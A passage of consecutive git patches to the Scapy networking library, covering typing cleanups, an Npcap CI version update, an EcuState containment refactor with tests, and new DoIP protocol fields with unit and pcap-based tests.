class OID(Gen[str]): @@ -282,7 +279,7 @@ def __iterlen__(self): ###################################### class Packet_metaclass(_Generic_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] @@ -349,24 +346,25 @@ def __new__(cls, # type: ignore ]) except (ImportError, AttributeError, KeyError): pass - newcls = type.__new__(cls, name, bases, dct) + newcls = cast('Type[scapy.packet.Packet]', + type.__new__(cls, name, bases, dct)) # Note: below can't be typed because we use attributes # created dynamically.. - newcls.__all_slots__ = set( # type: ignore + newcls.__all_slots__ = set( attr for cls in newcls.__mro__ if hasattr(cls, "__slots__") for attr in cls.__slots__ ) - newcls.aliastypes = ( # type: ignore + newcls.aliastypes = ( [newcls] + getattr(newcls, "aliastypes", []) ) if hasattr(newcls, "register_variant"): - newcls.register_variant() # type: ignore - for f in newcls.fields_desc: # type: ignore - if hasattr(f, "register_owner"): - f.register_owner(newcls) + newcls.register_variant() + for _f in newcls.fields_desc: + if hasattr(_f, "register_owner"): + _f.register_owner(newcls) if newcls.__name__[0] != "_": from scapy import config config.conf.layers.register(newcls) @@ -405,7 +403,7 @@ def __call__(cls, # Note: see compat.py for an explanation class Field_metaclass(_Generic_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] @@ -413,7 +411,7 @@ def __new__(cls, # type: ignore # type: (...) -> Type[scapy.fields.Field[Any, Any]] dct.setdefault("__slots__", []) newcls = super(Field_metaclass, cls).__new__(cls, name, bases, dct) - return newcls + return newcls # type: ignore PacketList_metaclass = Field_metaclass diff --git a/scapy/compat.py b/scapy/compat.py index 35cee1e13a9..88faa243fd8 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -173,7 +173,7 @@ def cast(_type, obj): # type: ignore Iterator = _FakeType("Iterator") # type: ignore List = _FakeType("List", list) # type: ignore NewType = _FakeType("NewType") - NoReturn = _FakeType("NoReturn") # type: ignore + NoReturn = _FakeType("NoReturn") Optional = _FakeType("Optional") Pattern = _FakeType("Pattern") # type: ignore Sequence = _FakeType("Sequence", list) # type: ignore diff --git a/scapy/config.py b/scapy/config.py index db576fe46d9..22a1bec98ea 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -730,7 +730,7 @@ class Conf(ConfClass): promisc = True sniff_promisc = 1 #: default mode for sniff() raw_layer = None # type: Type[Packet] - raw_summary = False + raw_summary = False # type: Union[bool, Callable[[bytes], Any]] padding_layer = None # type: Type[Packet] default_l2 = None # type: Type[Packet] l2types = Num2Layer() diff --git a/scapy/extlib.py b/scapy/extlib.py index d86427a7133..d6f4bcefcb2 100644 --- a/scapy/extlib.py +++ b/scapy/extlib.py @@ -15,6 +15,15 @@ # in interactive mode, because it needs to be called after the # logger has been setup, to be able to print the warning messages +__all__ = [ + "Line2D", + "MATPLOTLIB", + "MATPLOTLIB_DEFAULT_PLOT_KARGS", + "MATPLOTLIB_INLINED", + "PYX", + "plt", +] + # MATPLOTLIB try: diff --git a/scapy/fields.py b/scapy/fields.py index 6e93e2a19f5..640982e1efb 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2940,7 +2940,7 @@ def i2repr(self, return "None" if x is None else str(self._fixup_val(x)) -MultiFlagsEntry = collections.namedtuple('MultiFlagEntry', ['short', 'long']) +MultiFlagsEntry = collections.namedtuple('MultiFlagsEntry', ['short', 'long']) class MultiFlagsField(_BitField[Set[str]]): @@ -3554,7 +3554,7 @@ def any2i(self, else: u = UUID(plain_str(x)) elif isinstance(x, (UUID, RandUUID)): - u = x + u = cast(UUID, x) else: return None return u diff --git a/scapy/packet.py b/scapy/packet.py index aaa74b6c29c..2de4467895f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1642,7 +1642,7 @@ def __new__(cls, *args, **kargs): if singl is None: cls.__singl__ = singl = Packet.__new__(cls) Packet.__init__(singl) - return singl # type: ignore + return singl def __init__(self, *args, **kargs): # type: (*Any, **Any) -> None diff --git a/scapy/pipetool.py b/scapy/pipetool.py index e998a992fb5..873f3a80e9d 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -32,6 +32,7 @@ Type, TypeVar, _Generic_metaclass, + cast, ) @@ -132,7 +133,7 @@ def run(self): p.start() sources = self.active_sources sources.add(self) - exhausted = set([]) # type: Set[Pipe] + exhausted = set([]) # type: Set[Union[Source, PipeEngine]] RUN = True STOP_IF_EXHAUSTED = False while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1): @@ -236,13 +237,14 @@ def graph(self, **kargs): class _PipeMeta(_Generic_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): # type: (...) -> Type[Pipe] - c = type.__new__(cls, name, bases, dct) + c = cast('Type[Pipe]', + super(_PipeMeta, cls).__new__(cls, name, bases, dct)) PipeEngine.pipes[name] = c return c diff --git a/scapy/sessions.py b/scapy/sessions.py index 27de2a31fd7..62be34ec97d 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -185,7 +185,7 @@ def append(self, data, seq): # for ifrag in self.incomplete: # if [???]: # self.incomplete.remove([???]) - memoryview(self.content)[seq:seq + data_len] = data # type: ignore + memoryview(self.content)[seq:seq + data_len] = data def full(self): # type: () -> bool diff --git a/scapy/utils.py b/scapy/utils.py index 427a2c264a1..5df7f19f387 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -626,7 +626,7 @@ def inet_aton(ip_string): else: return socket.inet_aton(ip_string) else: - inet_aton = socket.inet_aton + inet_aton = socket.inet_aton # type: ignore inet_ntoa = socket.inet_ntoa @@ -1395,7 +1395,7 @@ class RawPcapNgReader(RawPcapReader): alternative = RawPcapReader # type: Type[Any] - PacketMetadata = collections.namedtuple("PacketMetadataNg", + PacketMetadata = collections.namedtuple("PacketMetadataNg", # type: ignore ["linktype", "tsresol", "tshigh", "tslow", "wirelen"]) diff --git a/tox.ini b/tox.ini index b745aa89422..04dc18d427a 100644 --- a/tox.ini +++ b/tox.ini @@ -83,8 +83,9 @@ commands = [testenv:mypy] description = "Check Scapy compliance against static typing" skip_install = true -deps = mypy==0.790 +deps = mypy==0.931 typing + types-mock commands = python .config/mypy/mypy_check.py From 9ab01d83d0818f3fc062594fc1f69f4b70fdda84 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 8 Feb 2022 13:26:33 +0100 Subject: [PATCH 0734/1632] Update npcap version --- .config/appveyor/InstallNpcap.ps1 | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/appveyor/InstallNpcap.ps1 index d8d3026e6b2..ec27717e90e 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/appveyor/InstallNpcap.ps1 @@ -1,7 +1,7 @@ # Install Npcap on the machine. # Config: -$npcap_oem_file = "npcap-1.55-oem.exe" +$npcap_oem_file = "npcap-1.60-oem.exe" # Note: because we need the /S option (silent), this script has two cases: # - The script is runned from a master build, then use the secure variable 'npcap_oem_key' which will be available @@ -28,6 +28,7 @@ if (Test-Path Env:npcap_oem_key){ # Key is here: on master Invoke-WebRequest -uri (-join("https://nmap.org/npcap/oem/dist/",$npcap_oem_file)) -OutFile $file -Headers $headers -Credential $credential } catch [System.Net.WebException],[System.IO.IOException] { Write-Error "Error while dowloading npcap !" + Write-Warning $Error[0] exit 1 } } else { # No key: PRs From 4b672e9141d9af81e80df7adeb6700839b48463d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 9 Feb 2022 17:45:56 +0100 Subject: [PATCH 0735/1632] Refactoring of EcuState (#3512) * Refactoring of EcuState __contains__ method * remove parallel tox for debug * temporary disable imports test * revert changes * revert changes * cleanup * fix unit test * only allow one recv error at a time in UnstableSocket * remove send_delay to speed up unit tests * fix test --- scapy/compat.py | 3 ++ scapy/contrib/automotive/ecu.py | 55 ++++++++++++++++---- test/contrib/automotive/ecu.uts | 68 +++++++++++++++++++++++++ test/contrib/automotive/obd/scanner.uts | 2 +- test/testsocket.py | 27 +++++++--- 5 files changed, 136 insertions(+), 19 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index 88faa243fd8..a1b65ddf9c2 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -47,6 +47,7 @@ 'Type', 'TypeVar', 'Union', + 'ValuesView', 'cast', 'overload', 'FAKE_TYPING', @@ -153,6 +154,7 @@ def __repr__(self): Type, TypeVar, Union, + ValuesView, cast, overload, ) @@ -183,6 +185,7 @@ def cast(_type, obj): # type: ignore Type = _FakeType("Type", type) TypeVar = _FakeType("TypeVar") # type: ignore Union = _FakeType("Union") + ValuesView = _FakeType("List", list) # type: ignore class Sized(object): # type: ignore pass diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index a79cf989ff3..6ee49c71960 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -11,19 +11,21 @@ import time import random import copy +import itertools from collections import defaultdict from types import GeneratorType from threading import Lock +import scapy.modules.six as six from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ - Tuple, Type, cast, Dict, orb + Tuple, Type, cast, Dict, orb, ValuesView from scapy.packet import Raw, Packet from scapy.plist import PacketList from scapy.sessions import DefaultSession from scapy.ansmachine import AnsweringMachine from scapy.supersocket import SuperSocket -from scapy.error import Scapy_Exception +from scapy.error import Scapy_Exception, warning __all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession", @@ -36,15 +38,53 @@ class EcuState(object): example UDS or GMLAN. A EcuState supports comparison and serialization (command()). """ + __slots__ = ["__dict__", "__cache__"] + def __init__(self, **kwargs): # type: (Any) -> None + self.__cache__ = None # type: Optional[Tuple[List[EcuState], ValuesView[Any]]] # noqa: E501 for k, v in kwargs.items(): + if isinstance(v, (six.string_types, bytes)): + warning("Be careful on usages of 'comparisons' and " + "'if x in y' if you provide a string type as value") if isinstance(v, GeneratorType): v = list(v) self.__setattr__(k, v) + def _expand(self): + # type: () -> List[EcuState] + if self.__cache__ is None or \ + self.__cache__[1] != self.__dict__.values(): + expanded = list() + for x in itertools.product( + *[self._flatten(v) for v in self.__dict__.values()]): + kwargs = {} + for i, k in enumerate(self.__dict__.keys()): + if x[i] is None: + continue + kwargs[k] = x[i] + expanded.append(EcuState(**kwargs)) + self.__cache__ = (expanded, self.__dict__.values()) + return self.__cache__[0] + + @staticmethod + def _flatten(x): + # type: (Any) -> List[Any] + if hasattr(x, "__iter__") and hasattr(x, "__len__") and len(x) == 1: + return list(*x) + elif not hasattr(x, "__iter__"): + return [x] + flattened = list() + for y in x: + if hasattr(x, "__iter__"): + flattened += EcuState._flatten(y) + else: + flattened += [y] + return flattened + def __delitem__(self, key): # type: (str) -> None + self.__cache__ = None del self.__dict__[key] def __len__(self): @@ -57,6 +97,7 @@ def __getitem__(self, item): def __setitem__(self, key, value): # type: (str, Any) -> None + self.__cache__ = None self.__dict__[key] = value def __repr__(self): @@ -79,14 +120,7 @@ def __contains__(self, item): # type: (EcuState) -> bool if not isinstance(item, EcuState): return False - if len(self.__dict__) != len(item.__dict__): - return False - try: - return all(ov == sv or (hasattr(sv, "__iter__") and ov in sv) - for sv, ov in - zip(self.__dict__.values(), item.__dict__.values())) - except (KeyError, TypeError): - return False + return all(s in self._expand() for s in item._expand()) def __ne__(self, other): # type: (object) -> bool @@ -137,6 +171,7 @@ def __hash__(self): def reset(self): # type: () -> None + self.__cache__ = None keys = list(self.__dict__.keys()) for k in keys: del self.__dict__[k] diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index cc12c750276..41313a00c66 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -275,6 +275,74 @@ assert s1 != s2 assert s2 not in s1 assert s1 not in s2 +s1 = EcuState(ses=range(4), security=[None, 5]) +s2 = EcuState(ses=1) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, 5]) +s2 = EcuState(ses=range(2)) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, 5]) +s2 = EcuState(ses=range(2), security=5) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, 5]) +s2 = EcuState(ses=range(5)) + +assert s1 != s2 +assert s2 not in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, range(5)]) +s2 = EcuState(ses=3) + +print(s1._expand()) +print(s2._expand()) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, range(5), [5, 7, range(4), [range(10), 10]]]) +s2 = EcuState(ses=3, security=10) + +print(s1._expand()) +print(s2._expand()) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, range(5), [5, 7, range(4), [range(10), "B"]]]) +s2 = EcuState(ses=3, security="B") + +print(s1._expand()) +print(s2._expand()) + +assert s1 != s2 +assert s2 in s1 +assert s1 not in s2 + +s1 = EcuState(ses=range(4), security=[None, range(5), [5, 7, range(4), [range(10), "B"]]]) +s2 = EcuState(ses=3, security="C") + +print(s1._expand()) +print(s2._expand()) + +assert s1 != s2 +assert s2 not in s1 +assert s1 not in s2 + s1 = EcuState(ses=range(3), security=5) s2 = EcuState(ses=1, security=5) diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index eb634104e3c..c4a6c273fbc 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -7,12 +7,12 @@ = Imports from test.testsocket import TestSocket, cleanup_testsockets +from scapy.contrib.automotive.ecu import * # noqa: F403 = Load contribution layer load_contrib("automotive.obd.obd", globals_dict=globals()) load_contrib("automotive.obd.scanner", globals_dict=globals()) -load_contrib("automotive.ecu", globals_dict=globals()) = Create sockets diff --git a/test/testsocket.py b/test/testsocket.py index 81a87ea41a1..121104f14e0 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -102,16 +102,27 @@ class UnstableSocket(TestSocket): packets on recv. """ + def __init__(self, basecls=None): + # type: (Optional[Type[Packet]]) -> None + super(UnstableSocket, self).__init__(basecls) + self.last_rx_was_error = False + def recv(self, x=MTU): # type: ignore # type: (int) -> Optional[Packet] - if random.randint(0, 1000) == 42: - raise OSError("Socket closed") - if random.randint(0, 1000) == 13: - raise Scapy_Exception("Socket closed") - if random.randint(0, 1000) == 7: - raise ValueError("Socket closed") - if random.randint(0, 1000) == 113: - return None + if not self.last_rx_was_error: + if random.randint(0, 1000) == 42: + self.last_rx_was_error = True + raise OSError("Socket closed") + if random.randint(0, 1000) == 13: + self.last_rx_was_error = True + raise Scapy_Exception("Socket closed") + if random.randint(0, 1000) == 7: + self.last_rx_was_error = True + raise ValueError("Socket closed") + if random.randint(0, 1000) == 113: + self.last_rx_was_error = True + return None + self.last_rx_was_error = False return super(UnstableSocket, self).recv(x) From 3136230f80d7950a09ee7d7282a6de535dd506d6 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 9 Feb 2022 17:47:22 +0100 Subject: [PATCH 0736/1632] Fix #3507 (#3511) * Fix #3507 * Extended activation type enum * minor enhancment * fix unit test --- scapy/contrib/automotive/doip.py | 33 ++++++++++++++++----------- test/contrib/automotive/doip.uts | 38 +++++++++++++++++++++++++++----- 2 files changed, 53 insertions(+), 18 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 3c1cf4528fd..2f01209c9b9 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -14,7 +14,7 @@ from scapy.fields import ByteEnumField, ConditionalField, \ XByteField, XShortField, XIntField, XShortEnumField, XByteEnumField, \ - IntField, StrFixedLenField + IntField, StrFixedLenField, XStrField from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.supersocket import StreamSocket from scapy.layers.inet import TCP, UDP @@ -143,7 +143,8 @@ class DoIP(Packet): ConditionalField(XShortField("source_address", 0), lambda p: p.payload_type in [5, 8, 0x8001, 0x8002, 0x8003]), # noqa: E501 ConditionalField(XByteEnumField("activation_type", 0, { - 0: "Default", 1: "WWH-OBD", 0xe0: "Central security" + 0: "Default", 1: "WWH-OBD", 0xe0: "Central security", + 0x16: "Default", 0x116: "Diagnostic", 0xe016: "Central security" }), lambda p: p.payload_type in [5]), ConditionalField(XShortField("logical_address_tester", 0), lambda p: p.payload_type in [6]), @@ -157,7 +158,8 @@ class DoIP(Packet): 0x04: "Routing activation denied due to missing authentication.", 0x05: "Routing activation denied due to rejected confirmation.", 0x06: "Routing activation denied due to unsupported routing activation type.", # noqa: E501 - 0x07: "Reserved by ISO 13400.", 0x08: "Reserved by ISO 13400.", + 0x07: "Routing activation denied because the specified activation type requires a secure TLS TCP_DATA socket.", # noqa: E501 + 0x08: "Reserved by ISO 13400.", 0x09: "Reserved by ISO 13400.", 0x0a: "Reserved by ISO 13400.", 0x0b: "Reserved by ISO 13400.", 0x0c: "Reserved by ISO 13400.", 0x0d: "Reserved by ISO 13400.", 0x0e: "Reserved by ISO 13400.", @@ -167,7 +169,7 @@ class DoIP(Packet): }), lambda p: p.payload_type in [6]), ConditionalField(XIntField("reserved_iso", 0), lambda p: p.payload_type in [5, 6]), - ConditionalField(XIntField("reserved_oem", 0), + ConditionalField(XStrField("reserved_oem", b""), lambda p: p.payload_type in [5, 6]), ConditionalField(XByteEnumField("diagnostic_power_mode", 0, { 0: "not ready", 1: "ready", 2: "not supported" @@ -175,7 +177,7 @@ class DoIP(Packet): ConditionalField(ByteEnumField("node_type", 0, { 0: "DoIP gateway", 1: "DoIP node" }), lambda p: p.payload_type in [0x4002]), - ConditionalField(XByteField("max_open_sockets", 0), + ConditionalField(XByteField("max_open_sockets", 1), lambda p: p.payload_type in [0x4002]), ConditionalField(XByteField("cur_open_sockets", 0), lambda p: p.payload_type in [0x4002]), @@ -249,6 +251,8 @@ class DoIPSocket(StreamSocket): determined if routing activation request is sent :param activation_type: This allows to set a different activation type for the routing activation request + :param reserved_oem: Optional parameter to set value for reserved_oem field + of routing activation request Example: >>> socket = DoIPSocket("169.254.0.131") @@ -257,8 +261,8 @@ class DoIPSocket(StreamSocket): """ # noqa: E501 def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, source_address=0xe80, target_address=0, - activation_type=0): - # type: (str, int, bool, int, int, int) -> None + activation_type=0, reserved_oem=b""): + # type: (str, int, bool, int, int, int, bytes) -> None self.ip = ip self.port = port self.source_address = source_address @@ -266,7 +270,7 @@ def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, if activate_routing: self._activate_routing( - source_address, target_address, activation_type) + source_address, target_address, activation_type, reserved_oem) def _init_socket(self, sock_family=socket.AF_INET): # type: (int) -> None @@ -279,11 +283,12 @@ def _init_socket(self, sock_family=socket.AF_INET): def _activate_routing(self, source_address, # type: int target_address, # type: int - activation_type # type: int + activation_type, # type: int + reserved_oem=b"" # type: bytes ): # type: (...) -> None resp = self.sr1( DoIP(payload_type=0x5, activation_type=activation_type, - source_address=source_address), + source_address=source_address, reserved_oem=reserved_oem), verbose=False, timeout=1) if resp and resp.payload_type == 0x6 and \ resp.routing_activation_response == 0x10: @@ -311,6 +316,8 @@ class DoIPSocket6(DoIPSocket): determined if routing activation request is sent :param activation_type: This allows to set a different activation type for the routing activation request + :param reserved_oem: Optional parameter to set value for reserved_oem field + of routing activation request Example: >>> socket = DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") @@ -319,8 +326,8 @@ class DoIPSocket6(DoIPSocket): """ # noqa: E501 def __init__(self, ip='::1', port=13400, activate_routing=True, source_address=0xe80, target_address=0, - activation_type=0): - # type: (str, int, bool, int, int, int) -> None + activation_type=0, reserved_oem=b""): + # type: (str, int, bool, int, int, int, bytes) -> None self.ip = ip self.port = port self.source_address = source_address @@ -328,7 +335,7 @@ def __init__(self, ip='::1', port=13400, activate_routing=True, if activate_routing: super(DoIPSocket6, self)._activate_routing( - source_address, target_address, activation_type) + source_address, target_address, activation_type, reserved_oem) class UDS_DoIPSocket(DoIPSocket): diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 59b4f5d5004..5c77e53d41f 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -80,6 +80,19 @@ assert p.vin_gid_status == 0 p = DoIP(bytes(DoIP(payload_type=5))) +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 7 +assert p.payload_type == 5 +assert p.source_address == 0 +assert p.activation_type == 0 +assert p.reserved_iso == 0 +assert p.reserved_oem == b"" + += Build test 5.1 + +p = DoIP(bytes(DoIP(payload_type=5, reserved_oem=b"1234"))) + assert p.protocol_version == 0x02 assert p.inverse_version == 0xfd assert p.payload_length == 11 @@ -87,7 +100,22 @@ assert p.payload_type == 5 assert p.source_address == 0 assert p.activation_type == 0 assert p.reserved_iso == 0 -assert p.reserved_oem == 0 +p.show() +print(p.reserved_oem) +assert p.reserved_oem == b"1234" + += Build test 5.2 + +p = DoIP(bytes(DoIP(payload_type=5, reserved_oem=b"12"))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 9 +assert p.payload_type == 5 +assert p.source_address == 0 +assert p.activation_type == 0 +assert p.reserved_iso == 0 +assert p.reserved_oem == b"12" = Build test 6 @@ -95,12 +123,12 @@ p = DoIP(bytes(DoIP(payload_type=6))) assert p.protocol_version == 0x02 assert p.inverse_version == 0xfd -assert p.payload_length == 13 +assert p.payload_length == 9 assert p.payload_type == 6 assert p.logical_address_tester == 0 assert p.logical_address_doip_entity == 0 assert p.reserved_iso == 0 -assert p.reserved_oem == 0 +assert p.reserved_oem == b"" = Build test 7 @@ -140,7 +168,7 @@ assert p.inverse_version == 0xfd assert p.payload_length == 7 assert p.payload_type == 0x4002 assert p.node_type == 0 -assert p.max_open_sockets == 0 +assert p.max_open_sockets == 1 assert p.cur_open_sockets == 0 assert p.max_data_size == 0 @@ -220,7 +248,7 @@ assert p.payload_type == 0x5 assert p.source_address == 0xe80 assert p.activation_type == 0 assert p.reserved_iso == 0 -assert p.reserved_oem == 0 +assert p.reserved_oem == b"\x00\x00\x00\x00" = dissect test of routing activation pkts resp From 4f42d2522915312ba2bbfb4c434a13ae9fc9ec8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Damian=20Zar=C4=99ba?= Date: Tue, 15 Feb 2022 10:03:26 +0100 Subject: [PATCH 0737/1632] DoIP: Add previous_msg field to ACK & NACK + expand tests (#3530) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Add previous_msg field to ACK & NACK + expand tests * Add dissection with pcap and raw creation based tests * Fix typo in test Co-authored-by: Damian Zaręba --- scapy/contrib/automotive/doip.py | 2 + test/contrib/automotive/doip.uts | 83 ++++++++++++++++++++++++++++++- test/pcaps/doip_ack.pcap | Bin 0 -> 110 bytes 3 files changed, 84 insertions(+), 1 deletion(-) create mode 100644 test/pcaps/doip_ack.pcap diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 2f01209c9b9..8e41c317e51 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -194,6 +194,8 @@ class DoIP(Packet): 0x06: "Target unreachable", 0x07: "Unknown network", 0x08: "Transport protocol error" }), lambda p: p.payload_type in [0x8003]), + ConditionalField(XStrField("previous_msg", b""), + lambda p: p.payload_type in [0x8002, 0x8003]) ] def answers(self, other): diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 5c77e53d41f..33dc9793f6d 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -215,6 +215,39 @@ assert p.payload_type == 0x8002 assert p.source_address == 0 assert p.target_address == 0 assert p.ack_code == 0 +assert p.previous_msg == b'' + +p = DoIP(bytes(DoIP(payload_type=0x8002, previous_msg=b'\x22\xfd\x32'))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 8 +assert p.payload_type == 0x8002 +assert p.source_address == 0 +assert p.target_address == 0 +assert p.ack_code == 0 +assert p.previous_msg == b'\x22\xfd\x32' + +p = DoIP(bytes(DoIP(payload_type=0x8002, previous_msg=b'\x19\x02\x09\x9C\x00'))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 10 +assert p.payload_type == 0x8002 +assert p.source_address == 0 +assert p.target_address == 0 +assert p.ack_code == 0 +assert p.previous_msg == b'\x19\x02\t\x9c\x00' + +p = DoIP(b'\x02\xfd\x80\x02\x00\x00\x00\x07\x00\x08\x00\x0e\x00\x10\x01') +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xFD +assert p.payload_length == 7 +assert p.payload_type == 0x8002 +assert p.source_address == 0x8 +assert p.target_address == 0xE +assert p.ack_code == 0 +assert p.previous_msg == b'\x10\x01' = Build test 8003 @@ -228,9 +261,57 @@ assert p.source_address == 0 assert p.target_address == 0 assert p.nack_code == 0 + +p = DoIP(bytes(DoIP(payload_type=0x8003, previous_msg=b'\x2E\xfd\x32\x01\x02'))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 10 +assert p.payload_type == 0x8003 +assert p.source_address == 0 +assert p.target_address == 0 +assert p.nack_code == 0 +assert p.previous_msg == b'.\xfd2\x01\x02' + +p = DoIP(bytes(DoIP(payload_type=0x8003, previous_msg=b'\x19\x02\x09\x9A\x00'))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 10 +assert p.payload_type == 0x8003 +assert p.source_address == 0 +assert p.target_address == 0 +assert p.nack_code == 0 +assert p.previous_msg == b'\x19\x02\t\x9a\x00' + +p = DoIP(b'\x02\xfd\x80\x03\x00\x00\x00\x07\x00\x0A\x00\x0C\x00\x10\x03') +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xFD +assert p.payload_length == 7 +assert p.payload_type == 0x8003 +assert p.source_address == 0xA +assert p.target_address == 0xC +assert p.nack_code == 0 +assert p.previous_msg == b'\x10\x03' + + pcap based tests -= read pcap file += read diag_ack pcap file +pkt = rdpcap("test/pcaps/doip_ack.pcap").res[0] + +assert len(pkt) == 70 + += dissect test of diag ACK with previous_msg field filled +assert pkt.protocol_version == 0x02 +assert pkt.inverse_version == 0xFD +assert pkt.payload_length == 8 +assert pkt.source_address == 0x4B +assert pkt.target_address == 0xE00 +assert pkt.ack_code == 0 +assert pkt.previous_msg == b'\x22\xFD\x31' + + += read main pcap file pkts = rdpcap("test/pcaps/doip.pcap.gz") ips = [p for p in pkts if p.proto == 6] diff --git a/test/pcaps/doip_ack.pcap b/test/pcaps/doip_ack.pcap new file mode 100644 index 0000000000000000000000000000000000000000..9c07e43cfdc52a60890d953c46987d317cd8e6ea GIT binary patch literal 110 zcmca|c+)~A1{MYw`2U}Qff2|FF=kC-Q|4lD1F}JQ6&RcW0}cjP1_le}Tn7dRwynz! stYBmYVlI;i#TN`#p;bV|c>xj%442s$7?}PxFah}-4BmVU3`&0u0Zx=0wEzGB literal 0 HcmV?d00001 From 52214c4582bfe843ac8641c196763fc7cb57bcbd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 11 Feb 2022 16:13:58 +0100 Subject: [PATCH 0738/1632] This PR proposes a solution for #3430 --- scapy/contrib/automotive/doip.py | 15 +----------- .../contrib/automotive/scanner/enumerator.py | 7 ++---- scapy/contrib/automotive/scanner/executor.py | 4 ++++ scapy/sendrecv.py | 24 +++++++++++++------ test/regression.uts | 15 ++++++++++++ test/testsocket.py | 11 +++++++++ 6 files changed, 50 insertions(+), 26 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 8e41c317e51..0bb75611d74 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -363,20 +363,7 @@ def send(self, x): except AttributeError: pass - try: - return super(UDS_DoIPSocket, self).send(pkt) - except Exception as e: - # Workaround: - # This catch block is currently necessary to detect errors - # during send. In automotive application it's not uncommon that - # a destination socket goes down. If any function based on - # SndRcvHandler is used, all exceptions are silently handled - # in the send part. This means, a caller of the SndRcvHandler - # can not detect if an error occurred. This workaround closes - # the socket if a send error was detected. - log_interactive.error("Exception: %s", e) - self.close() - return 0 + return super(UDS_DoIPSocket, self).send(pkt) def recv(self, x=MTU): # type: (int) -> Optional[Packet] diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index f891322d8ba..1d069c04775 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -284,10 +284,7 @@ def execute(self, socket, state, **kwargs): def sr1_with_retry_on_error(self, req, socket, state, timeout): # type: (Packet, _SocketUnion, EcuState, int) -> Optional[Packet] try: - res = socket.sr1(req, timeout=timeout, verbose=False) - if socket.closed: - log_interactive.critical("[-] Socket closed during scan.") - raise Scapy_Exception("Socket closed during scan") + res = socket.sr1(req, timeout=timeout, verbose=False, chainEX=True) except (OSError, ValueError, Scapy_Exception) as e: if not self._populate_retry(state, req): log_interactive.critical( @@ -750,7 +747,7 @@ def transition_function( return False try: - res = sock.sr1(req, timeout=20, verbose=False) + res = sock.sr1(req, timeout=20, verbose=False, chainEX=True) return res is not None and res.service != 0x7f except (OSError, ValueError, Scapy_Exception) as e: 